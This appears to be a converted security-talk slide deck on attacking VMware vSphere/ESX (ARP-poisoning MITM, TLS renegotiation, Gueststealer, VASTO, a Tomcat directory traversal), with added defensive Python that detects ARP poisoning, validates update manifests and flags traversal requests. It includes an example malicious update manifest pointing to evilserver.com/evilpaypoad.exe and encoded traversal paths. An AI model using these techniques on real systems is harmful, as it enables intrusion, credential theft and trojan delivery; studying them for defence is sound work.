Does vSphere really have some major issues?
- Recent cases involving VMware
- Pen testing methodology
- Gueststealer
- Tomcat zero day directory traversal
- VASTO
- Mitigation techniques
- Future concerns?

VMware: 80% of the market share
- Do the tools used in pen testing work with virtualization?
- Are there hacks being designed just for VMware?
- What is this costing us?
- VMware moving away from ESX to VMware Hypervisor (ESXi)
[Diagram: VMware ESX hypervisor vs. VMware ESXi Type 1 hypervisor (SC, L2 switch, POSIX shell). Provided by The Virtualization Practice.com]
What are the main security concerns associated with virtualization in general?
- Segregation of duties
- Accounting/logging
- New APIs: VMsafe, vStorage, vNetwork
- VMsafe virtual appliances
- Plug-ins
- Shared resources: can they be attacked? Memory, CPU, datastore

Threats
- Perceived risks vs. known risks
- Probability
- Potential impact
It is really a hardened Linux kernel. It is still just another layer to attack!
- Common management errors
- ARP cache poisoning
- Update Manager
- SSLv3/TLS renegotiation
- Web server vulnerability
- Many we know of today: full-on exploits in Metasploit and Exploit DB

Secunia historic advisories: ESX 4.x, ESXi 4.x, vCenter Server 4.x
nvd.nist.gov: over 40 vulnerabilities for VMware products
McAfee threats:
- VMware ESX Server heap buffer overflow
- vCenter Update Manager CSS
- vCenter Update Manager directory traversal
I can't tell you how many times I was asked to delay a pen test because the client was not READY??? What is that? When was the last time a hacker asked if you were ready before he attacked you? What is your current posture? How secure are you? How have you empowered your people to do the correct things?
This does not change, regardless of the environment being tested.
- Information gathering
- Scanning
- Enumeration
- Penetration
  - Fail: start over, or tell them great job
  - Succeed: escalate privileges, steal data or leave proof of hack, cover tracks, leave backdoors

- Google
- NMAP (since v4.8)
- Ettercap
- Cain and Abel
- Metasploit
- VASTO (Virtualization ASsessment TOolkit), Claudio Criscione
We have to find the systems first. Just like any other service, ESX has its own tells. NMAP will give you what you need. Let's see this in action!
[Diagram: ARP cache poisoning MITM between the client and the ESX Server. The client's SSL request is answered with a fake certificate; the attacker stops, copies and alters the cleartext, then forwards the SSL request to the server, which replies with its real self-signed certificate.]

ARP cache poisoning will allow us to perform a successful SSL crack! The hacking tools will create fake certificates. Two simultaneous SSL connections are established: one between the victim and the hacker, the other between the hacker and the real server. The communication process starts on port 443, and once the SSL authentication has been established VMware moves the communication to port 902.
VIC Client Login
You are still vulnerable even if you use vCenter. I can offer this: once the above password is stolen, you can log in to the host with the vpxuser and the above password.
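The MITM described above only works if the attacker can first poison the ARP caches on the management network. As an added example (not from the talk and not part of VASTO or any VMware tool), the Python below shows the detection side of that: a baseline of the expected IP-to-MAC pairs for the ESX host and the vCenter server is compared against ARP replies seen on the wire, and any reply that contradicts the baseline, or any station answering for several addresses, raises an alert. The addresses, MACs and tcpdump-style reply lines are all constructed for the example.

```python
"""Detect ARP cache poisoning on a virtualization management network.

Added example; constructed data throughout. The baseline and the captured
ARP replies are assumptions, not values from the talk.
"""
import re
from collections import defaultdict

# Constructed baseline of IP -> MAC recorded by the administrator.
BASELINE = {
    "192.0.2.10": "00:50:56:aa:bb:01",  # ESX host (constructed)
    "192.0.2.20": "00:50:56:aa:bb:02",  # vCenter server (constructed)
}

# Constructed tcpdump-style ARP reply lines from the management VLAN.
# The last three lines show one station answering for addresses it does not own.
SAMPLE_CAPTURE = """\
14:02:01.100 ARP, Reply 192.0.2.10 is-at 00:50:56:aa:bb:01, length 28
14:02:01.300 ARP, Reply 192.0.2.20 is-at 00:50:56:aa:bb:02, length 28
14:02:05.700 ARP, Reply 192.0.2.10 is-at 00:0c:29:de:ad:01, length 28
14:02:05.900 ARP, Reply 192.0.2.20 is-at 00:0c:29:de:ad:01, length 28
14:02:06.100 ARP, Reply 192.0.2.55 is-at 00:0c:29:de:ad:01, length 28
"""

ARP_REPLY_RE = re.compile(r"ARP, Reply (\S+) is-at ([0-9a-fA-F:]{17})")


def parse_arp_replies(capture_text):
    """Return (ip, mac) pairs for every ARP reply line in the capture."""
    pairs = []
    for line in capture_text.splitlines():
        m = ARP_REPLY_RE.search(line)
        if m:
            pairs.append((m.group(1), m.group(2).lower()))
    return pairs


def detect_arp_poisoning(replies, baseline):
    """Return alert strings for replies that contradict the baseline and for
    any MAC that claims more than one IP address."""
    alerts = []
    ips_per_mac = defaultdict(set)
    for ip, mac in replies:
        ips_per_mac[mac].add(ip)
        expected = baseline.get(ip)
        if expected is not None and expected.lower() != mac:
            alerts.append(f"{ip} claimed by {mac}, baseline says {expected}")
    for mac, ips in sorted(ips_per_mac.items()):
        if len(ips) > 1:
            alerts.append(
                f"{mac} answers for {len(ips)} addresses: {', '.join(sorted(ips))}"
            )
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(parse_arp_replies(SAMPLE_CAPTURE), BASELINE):
        print("ALERT:", alert)
```

The baseline check catches the poisoned replies for the two management hosts; the per-MAC count catches the same attacker even for addresses that were never baselined, which matters because the hosts involved in the attack are often not the ones the administrator thought to record.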
TLS renegotiation against ESX Server (HTTPS): client, attacker, server
- Step 1: TLS handshake, session #1 (client <> server) (1).
- Step 2: TLS handshake, session #2 (attacker <> server) (1.1, 1.2, 2). The attacker sends an application layer command of his choice; renegotiation is triggered.
- Step 3: TLS handshake, session #1 continued (client <> server) within the encrypted session #2 (attacker <> server) (3). Client data is encrypted within session #1 (green); the attacker cannot read or manipulate this data, but the previous data (1, 2) is prefixed to the newly sent client data (4).
VMINVENTORY.XML: /etc/vmware/hostd/vminventory.xml (default location) gives us guest inventory and location information.
GUEST.VMX & .VMDK: .vmx gives us guest config and file locations; .vmdk (disk image) can point to other .vmdk images.
Let's see the Gueststealer in action!
The nasty MiTM Attack!
VIlurker: the auto update process

The Auto Update Process:
    <patchversion>3.0.0</patchversion>
    <apiversion>3.1.0</apiversion>
    <downloadurl>https://*/client/vmwareviclient.exe</downloadurl>

The Evil Guy:
    <patchversion>10.0.0</patchversion>
    <apiversion>3.1.0</apiversion>
    <downloadurl>https://evilserver.com/evilpaypoad.exe</downloadurl>

- Change the clients.xml filename
- The package will run under the user's privilege! Administrator, anyone?
- Provide your nasty trojan package. Could be combined with other attacks.
- Create a fake web interface so you look legit!
- This can be done as MiTM or rogue server
- You will trigger a certificate error
Let's see this one in action! We are Troopers!
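The weakness the two manifests above illustrate is that the client follows whatever downloadurl and patchversion it is handed. As an added example (not from the talk, VASTO or VMware), the Python below applies the checks a hardened update client or a monitoring script would run on such a manifest before trusting it: HTTPS only, download host on an allowlist, the expected package name, and a plausible version step. The two manifests are constructed from the slide's values; the wrapper element, the trusted host name (the slide shows a wildcard) and the allowed version jump are assumptions.

```python
"""Validate a VI client update manifest before acting on it.

Added example. The <manifest> wrapper, the trusted host and the version
policy are assumptions; the element names and values follow the slide.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed manifest modelled on the legitimate slide; the wildcard host
# shown on the slide is replaced with an assumed vCenter host name.
GOOD_MANIFEST = """<manifest>
  <patchversion>3.0.0</patchversion>
  <apiversion>3.1.0</apiversion>
  <downloadurl>https://vcenter.example.internal/client/vmwareviclient.exe</downloadurl>
</manifest>"""

# Constructed manifest modelled on the attacker's slide.
EVIL_MANIFEST = """<manifest>
  <patchversion>10.0.0</patchversion>
  <apiversion>3.1.0</apiversion>
  <downloadurl>https://evilserver.com/evilpaypoad.exe</downloadurl>
</manifest>"""

TRUSTED_HOSTS = {"vcenter.example.internal"}  # assumed allowlist
EXPECTED_FILENAME = "vmwareviclient.exe"       # package name from the slide


def parse_version(text):
    """'3.0.0' -> (3, 0, 0); raises ValueError on anything non-numeric."""
    return tuple(int(part) for part in text.strip().split("."))


def check_update_manifest(xml_text, trusted_hosts, installed_version, max_major_jump=1):
    """Return a list of findings; an empty list means the manifest passed."""
    findings = []
    root = ET.fromstring(xml_text)
    url = (root.findtext(".//downloadurl") or "").strip()
    patch = (root.findtext(".//patchversion") or "").strip()

    parsed = urlparse(url)
    if parsed.scheme != "https":
        findings.append(f"download URL is not https: {url}")
    if parsed.hostname not in trusted_hosts:
        findings.append(f"download host {parsed.hostname!r} is not on the allowlist")
    if parsed.path.rsplit("/", 1)[-1].lower() != EXPECTED_FILENAME:
        findings.append(f"unexpected package name in {parsed.path}")

    try:
        offered = parse_version(patch)
    except ValueError:
        findings.append(f"unparsable patchversion {patch!r}")
    else:
        installed = parse_version(installed_version)
        if offered[0] - installed[0] > max_major_jump:
            findings.append(f"implausible version jump {installed_version} -> {patch}")
    return findings


if __name__ == "__main__":
    for name, manifest in (("good", GOOD_MANIFEST), ("evil", EVIL_MANIFEST)):
        print(name, check_update_manifest(manifest, TRUSTED_HOSTS, "3.0.0") or "OK")
```

None of these checks replaces proper certificate validation on the connection that fetched the manifest, which is what a MITM or rogue server defeats in the first place; they are a second layer that still fires when a user has clicked through the certificate error the slide mentions.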
- Autopwn: how easy can it get? Uses a flaw in the Tomcat web server; transfers the latest session file from vCenter using a directory traversal attack.
- Dictionary attack: how large is your dictionary file?
- Fingerprinting tool: need to know exactly what is running?

Any user that can access the server gets admin access to the server! VMware is using an old version of Tomcat that leaves the username and password in a world-readable file!
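A directory traversal against a web server leaves a recognisable trace in its access log, and until the old Tomcat is patched that log is the main place a defender can see the attack happen. As an added example (not from the talk, VASTO or VMware), the Python below scans combined-format access log lines, URL-decodes the request path (twice, to catch double encoding), treats backslashes as path separators, and flags any request whose path contains a `..` segment. The log lines, client addresses and paths are constructed; no real vCenter path is used.

```python
"""Flag directory traversal attempts in web server access logs.

Added example with constructed log lines; the paths are placeholders and
do not correspond to any real vCenter or Tomcat file location.
"""
import re
from urllib.parse import unquote

# Combined log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log. Lines 2 and 3 are traversal attempts (single and
# double URL encoding); line 4 has ".." inside a filename but is not a traversal.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2010:14:02:11 +0100] "GET /health/status.xml HTTP/1.1" 200 512
198.51.100.7 - - [10/Mar/2010:14:02:13 +0100] "GET /download/..%5c..%5c..%5cconfig/secret-placeholder.txt HTTP/1.1" 200 2048
203.0.113.9 - - [10/Mar/2010:14:05:40 +0100] "GET /download/%252e%252e/%252e%252e/config/secret-placeholder.txt HTTP/1.1" 200 2048
203.0.113.9 - - [10/Mar/2010:14:05:41 +0100] "GET /download/report..pdf HTTP/1.1" 200 90112
198.51.100.7 - - [10/Mar/2010:14:06:02 +0100] "POST /login HTTP/1.1" 302 0
"""


def decode_path(raw, rounds=2):
    """URL-decode up to `rounds` times (stops early when stable) and
    normalise backslashes, which some servers accept as separators."""
    path = raw
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(raw_path):
    """True if any path segment, after decoding, is exactly '..'."""
    path = decode_path(raw_path.split("?", 1)[0])
    return any(segment == ".." for segment in path.split("/"))


def find_traversal_attempts(log_text):
    """Return (client_ip, raw_path, status) for each traversal attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_traversal(m["path"]):
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_traversal_attempts(SAMPLE_LOG):
        flag = "SUCCEEDED?" if status == 200 else "blocked"
        print(f"{ip} {status} {flag} {path}")
```

A 200 on a flagged request deserves the most attention: with the file permissions the slide describes, that is the moment the credentials left the box, and the account they belong to should be treated as compromised.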
Must be trunked ports if VLANs are used

Future concerns
- Race conditions?
- VMsafe?
- Datastores?
- Other plug-ins?